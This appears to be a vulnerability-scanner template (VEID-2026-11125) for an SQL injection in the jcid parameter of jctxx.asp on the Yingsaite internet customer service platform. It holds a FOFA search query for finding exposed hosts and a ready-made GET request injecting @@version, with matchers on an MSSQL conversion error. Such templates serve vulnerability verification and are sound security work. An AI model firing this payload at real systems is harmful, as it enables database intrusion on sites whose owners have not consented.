## id: VEID-2026-11125
## name: 英赛特互联网客户服务平台 jctxx.asp处 SQL注入漏洞
## author: hack007x
## severity: high
## tags: veid,sql,veid2026
## description: 英赛特互联网客户服务平台 jctxx.asp处 SQL注入漏洞，攻击者可进行sql注入攻击获取数据库信息或者权限。
## affects: 英赛特互联网客户服务平台
## fofa-query: body="英赛特互联网客户服务平台"
## verification: true



GET /csccmise/jctxx.asp?jcid=@@version  HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}


#@ condition: and
#@ matcher: body contains "转换成数据类型 int 时失败"
#@ matcher: status_code == 500







# @VEIL-STAMP: 907bb13211db5c6c59c58506edb03ee12c4ff0a2f19f7ca3de640ac93d3420c1
